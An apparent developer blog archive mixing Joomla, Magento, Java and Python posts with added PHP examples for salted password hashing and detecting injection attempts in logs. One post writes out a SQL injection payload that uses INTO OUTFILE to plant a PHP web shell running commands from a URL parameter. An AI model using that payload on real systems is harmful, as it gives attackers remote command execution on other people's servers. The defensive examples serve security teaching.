who needs social life when you have broadband?

Inventas vitam iuvat excoluisse per artes / Let us improve life through science and art.

Magento and Joomla! integration - I need your help

Hello,

I forgot to blog about this here (posted only in my Portuguese blog :/) but I’ve been working on a Magento+Joomla! integration using JFusion. I’m coding this in my free time, as a hobby. This morning I managed to get login working and I would love it if some of you could help me test it before releasing anything to the public.

As this is a pre-alpha version, there won’t be a “one-click install” or anything. So, I expect that experienced programmers could help me test and improve this plugin. Credits will be given, of course.

If you are interested in helping, drop me a line: bigodines ~at~ joomla.com.br


How to add CAPTCHA to Joomla!’s com_contact component

The Dev team has just released Joomla! 1.5 stable. This is great news (after two and a half years of development we can finally use the new baby in a production environment) but I’ve seen that an old problem hasn’t been solved yet: people still get a lot of spam due to a weak (or nonexistent) mechanism to check whether the e-mails sent through com_contact come from real people or from spambots.

The beauty of open source is that anyone can change and improve a piece of software. So, here’s my $0.02: changing com_contact so that it works with your favorite Captcha plugin! (all files are downloadable at the end of this article)


Improve Magento’s security with salted passwords

It’s been a long time without new posts in my English blog :) sorry about that guys. I’ve been busy with the Portuguese blog (which gives me more feedback than this one…)

Last week I discovered Magento. This is the best open-source eCommerce software I’ve seen so far. Unfortunately I haven’t seen too much activity from the core team (three days with no commits in the SVN repository, and no one tested my suggestions to the code..). I guess it must be the holidays.

Anyways, the beauty of open source is collaboration. So I started doing my part and implemented salted passwords in Magento.

Why?

We all know that Rainbow Tables are getting bigger and bigger every day, and while studying Magento’s code I realised that they were storing passwords using a simple md5() function. That can be quite dangerous, especially for ecommerce software :).

In a couple of hours I came up with this simple solution to implement salted passwords without messing with Magento’s core package (although you will need to change the database, so PLEASE!! I’M BEGGING YOU TO CREATE A BACKUP BEFORE TRYING THIS!)

Here is the README file:

Salted Passwords in Magento
—————————-

This is a hack. There are no guarantees that your system will remain working smoothly :P

Install
——–

1 - Make sure you change the size of your password field. You may run something like this in your MySQL:

ALTER TABLE `admin_user` CHANGE `password` `password` VARCHAR( 60 )

2 - Sign in to the Magento admin (this is important because you’ll need to create a new user to start using salted passwords)

3 - Untar/Unzip this file in your root Magento folder (all files will be placed under the /community/ directory so you won’t lose anything if it doesn’t work)

4 - Create a new Magento user and give it administrator privileges (your current user won’t work anymore unless you change its password)

FAQ
—-

Q - I cannot login anymore!
A - I TOLD YOU TO LOGIN BEFORE UNZIPPING. You cannot login because the current users don’t use salted passwords and the new authentication method does. Here’s a workaround for this problem:

- Go to your phpMyAdmin (or any other software you use to manage your MySQL database)
- Browse the admin_user table
- Change your user’s password to: 5cf88201ea7be9037b934ec850c01a89:pQEuqfwbpJ
- Your new password is “changeMe” (without quotes)
- Login and change your password to the old one.

Now that you’ve read the README file you are ready to download and try salted passwords for Magento 0.7.1800

Download it here and let me know if it worked for you as well as it worked for me :D
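As an added example (not the plugin code from the download above; written for PHP 7.1+): the storage scheme the README’s FAQ implies, a fresh random salt per user kept beside the hash, with the salt-then-password concatenation order assumed since the post does not state it. It goes one step beyond the README by also accepting the old unsalted rows, so existing admins can be re-hashed on their next login instead of being locked out.

```php
<?php
// Added example, not the plugin's own code: the "md5hex:salt" storage format
// the README's FAQ shows. Concatenation order (salt . password) is assumed.
// Unlike the README's version it also accepts pre-hack unsalted rows so that
// existing admins can be migrated on their next successful login.

const SALT_LENGTH = 10; // the README's sample salt "pQEuqfwbpJ" has 10 chars

function generateSalt(int $length = SALT_LENGTH): string {
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $salt = '';
    for ($i = 0; $i < $length; $i++) {
        // random_int() is a CSPRNG; rand()/mt_rand() would be guessable.
        $salt .= $alphabet[random_int(0, strlen($alphabet) - 1)];
    }
    return $salt;
}

function hashPassword(string $password, ?string $salt = null): string {
    $salt = $salt ?? generateSalt();
    // Stored as "<md5(salt . password)>:<salt>", the shape of the FAQ row.
    return md5($salt . $password) . ':' . $salt;
}

function isLegacyHash(string $stored): bool {
    // Rows written before the hack hold a bare 32-char md5 and no ':' separator.
    return strpos($stored, ':') === false && strlen($stored) === 32;
}

function verifyPassword(string $password, string $stored): bool {
    if (isLegacyHash($stored)) {
        // Old unsalted row: on success the caller should store hashPassword($password).
        return hash_equals($stored, md5($password));
    }
    $parts = explode(':', $stored, 2);
    if (count($parts) !== 2 || $parts[1] === '') {
        return false;
    }
    [$hash, $salt] = $parts;
    // hash_equals() compares in constant time, closing a timing side channel.
    return hash_equals($hash, md5($salt . $password));
}

// Demo: create a salted row for the FAQ's temporary password and check it.
$stored = hashPassword('changeMe');
echo $stored, PHP_EOL;
var_dump(verifyPassword('changeMe', $stored));
var_dump(verifyPassword('wrong', $stored));
var_dump(verifyPassword('changeMe', md5('changeMe'))); // legacy unsalted row
```

A salt defeats precomputed tables but not a fast brute force against MD5 itself; on any current PHP, password_hash()/password_verify() (bcrypt) is the better choice.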


To: my future Canadian boss :-)

Hello!

I’m not sure if this post is going to help me or not but I’m blogging anyway :)

Fact is I wanna move to Canada. I’ve had enough of hot summers and would like to experience living abroad (again). So, if you are Canadian please check my résumé by clicking here and hire me hehehe. If you want, you may contact me directly by e-mail: bigodines ||at|| joomla.com.br

If you’re not sure whether it will be worth reading my resume, I’m the main developer of two of the most famous Joomla! sites around the globe: Porsche and UNRIC (please note: developer != designer). Ok, that sounds like I’m trying to impress :/. I don’t like these self-promotion lines but sometimes we need them :-)

Now, the bad news:
I’ve been reading about visas and it seems that a permanent work permit for skilled professionals (according to those HSMP calculators I found on the web I am a skilled professional :-P) can take up to 14 months. A friend told me that if I manage to find a company interested in my services, this waiting time may be shorter (I’m still checking this information).

There is also another alternative: I can go to Canada as a student and work legally 20hrs/week while waiting for my permanent visa… but first I need some networking contacts in Canada.

Drop me a line if you need a responsible, dynamic, nerdy web developer :P


Bigo Captcha 1.0 released :-D

Today I created my first Joomla! 1.5 extension. It’s a Captcha plugin. My friends were complaining that it was impossible to comment on my Portuguese blog, so I created this quick-and-funny captcha plugin which can be used with yvComment (or any component you want, because it is really generic).

I’m using the same structure as OSTCaptcha by CoolAcid, so the replacement should be transparent.

Download is available here

You may see a demo by visiting my Portuguese blog (see the comment plugin..)


Pyevolve - A Python Genetic Algorithms Framework

Hello, this is my redemption post after the long time without activity on the blog. I’m working on a complete Python genetic algorithms framework with many features; for now it is still under development, but there is an alpha version and some examples at the Google project hosting.

I’m doing my best to release new versions as soon as possible; I hope that this project will be used, since there are no good, easy-to-use GA frameworks in languages like Python.

http://code.google.com/p/pyevolve/

- Perone


JGroups-ME update

Today I’ve finished migrating JGroups-ME to version 2.4.1sp4 of JGroups. I’ve also finished porting the GossipRouter (created a MobileGossipRouter midlet that initializes it) and now we have a 100% mobile group communication toolkit which allows the creation of group communication systems for mobile computing!

Next step is to implement Bluetooth support (I’ll do this just after I finish writing my paper about JGroups-ME) and submit my version to the JGroups project so they can take a look and (maybe) commit to the official JGroups-ME version.

More on this subject soon. Please stay tuned ;P


back to basics

There are some tragic yet very interesting things happening to me.

As my undergrad project involves creating a group communication mechanism for mobile devices, I’m trying to become a Java programmer. I’ve never liked Java and you probably already know that. I don’t like it because it is slow and has too many fancy names for simple stuff (I guess this is just to increase the learning curve so Sun partners can sell more courses…). BUT, programming in JavaME is forcing me to practice/remember/learn a lot of techniques and algorithms I never thought I would need. So I’m almost saying that it is exciting to program in Java (for mobile devices!! the standard edition still sucks a lot).

I’ve been a programmer since I was 15 (7yrs ago). I started with mIRC Scripting (good times..), then I learned PHP, C (in college.. I’ve used it professionally only once, to develop a socket client-server application), Java and Python (which I use just for fun…), in that order. Although I don’t consider myself a good programmer, I can say I’m proficient in PHP (it’s been 5yrs now since I wrote my first mysql_fetch_array() snippet :P). The fact is that, except for C, all these languages give you so many built-in features and facilities that you forget some basic principles of programming.

I would dare to say that it is impossible to become a good programmer if you only know how to program in PHP, for example (and “writing applications that work” doesn’t make you a good programmer), because it makes programming too easy and too fast. Your boss will like it, and if you need some simple applications this is good enough, but if you learn PHP as a 1st language you probably won’t know how to optimize your code, or you will go crazy when you face more complex situations.

Even those JavaEE devs who think they are better than the rest of humanity should try to learn some “low level” algorithms (such as binary trees, linked lists, sockets, threading internals, scheduling, et cetera) because learning how to use an API is pretty easy compared to implementing these APIs :)

I’m not against PHP or Python and its classes/modules that make our life easier. I’m just concerned about learning how to use this stuff without knowing how they were made…

Here are my conclusions:
- There are languages that make you a faster programmer (or not)
- There are languages that make you a better programmer (or not)
- If I had to choose between a JavaME and a JavaSE/JavaEE programmer I would definitely choose the JavaME programmer because he *should* write more efficient code. And it is easier to teach someone how to use an API than to teach someone how to implement a serialization mechanism and send objects through the network.
- I’m a terrible English writer :) I’m considering starting to blog in Portuguese…


(real life) next steps in sql injection

We all know SQL Injection and a bunch of techniques to exploit it... I've decided to blog about a "new" one. Please don't consider this "advanced sql injection" because it's not :D

MySQL is a great database management system and it allows you to do many things with the "select" statement... perhaps TOO many things?

I guess everyone knows the basic "' or 1=1 /*" and its variants... but accessing restricted areas, changing user info and dropping tables aren't the only cool things you can do with sql injections.

There is a feature that allows you to save the result of your select into a file. It's called SELECT INTO OUTFILE (duh!) and things can get pretty dangerous if it is reachable through a sql injection.

Isn't it clear enough yet? Ok, let me try to help you get the big picture.

What if someone inserts this code:

SQL:
' union select ''<?php ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'',0,0,0,'*/ ?>' into outfile ' /home/mysite/lol.php' from users #

Please note that you'll need to know the document root path, but this shouldn't be a problem with vulnerable php systems.

Well, I don't intend to give you a cookbook and promote n00bism. So, if you still haven't figured out how to take advantage of this, you probably shouldn't use it. Google might help you as well :)

happy hacking.

PS: syntax errors were generated on purpose.
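A defender-side counterpart, added here and not part of the original post: a small PHP scanner that flags web-server log lines carrying the UNION ... INTO OUTFILE pattern discussed above. The log lines are constructed for the demo and the function names are mine.

```php
<?php
// Added example (not from the original post): flags access-log lines whose
// query string carries the SELECT ... INTO OUTFILE injection pattern.
// The log lines at the bottom are constructed for the demo, not real traffic.

function normalizeRequest(string $line): string {
    // Payloads arrive URL-encoded; decode, lowercase and squeeze whitespace so
    // "UNION%20%20SELECT" and "union select" look identical to the matcher.
    $decoded = urldecode(str_replace('+', ' ', $line));
    return strtolower(preg_replace('/\s+/', ' ', $decoded));
}

function classifyRequest(string $line): ?string {
    $n = normalizeRequest($line);
    $hasUnion   = preg_match('/\bunion\b.*\bselect\b/', $n) === 1;
    $hasOutfile = preg_match('/\binto (outfile|dumpfile)\b/', $n) === 1;
    if ($hasOutfile) {
        // A SELECT that writes a server-side file has no business in a web request.
        return 'critical: SELECT ... INTO OUTFILE/DUMPFILE attempt';
    }
    if ($hasUnion) {
        return 'high: UNION-based injection probe';
    }
    return null;
}

function scanAccessLog(array $lines): array {
    $hits = [];
    foreach ($lines as $i => $line) {
        $reason = classifyRequest($line);
        if ($reason !== null) {
            $hits[] = ['line' => $i + 1, 'reason' => $reason];
        }
    }
    return $hits;
}

// Constructed sample lines (Apache combined log format, trimmed).
$sampleLog = [
    '10.0.0.5 - - [12/Jan/2008:10:00:01 +0000] "GET /product.php?id=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Jan/2008:10:00:02 +0000] "GET /product.php?id=42%27%20union%20select%201,2,3%20/* HTTP/1.1" 200 1024',
    '10.0.0.9 - - [12/Jan/2008:10:00:03 +0000] "GET /product.php?id=42%27%20union%20select%20%27x%27%20into%20outfile%20%27/tmp/x.php%27%20%23 HTTP/1.1" 500 77',
];

foreach (scanAccessLog($sampleLog) as $hit) {
    printf("line %d: %s\n", $hit['line'], $hit['reason']);
}
```

Detection is the second line of defence: INTO OUTFILE needs the FILE privilege on the database account and is further constrained by MySQL's secure_file_priv setting, so the web application's account should hold neither the privilege nor a writable path there, and parameterized queries keep the quote from ever reaching the parser.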


too soon…

Remember when I said I'd found the best image generator class? It turned out that this class isn't everything I said it was. Actually it promises a lot of stuff, but it still has too many bugs (for example, you cannot create a simple png with a transparent background, and I've also had trouble centering my text).

At least this class is well written and has been easy to customize.
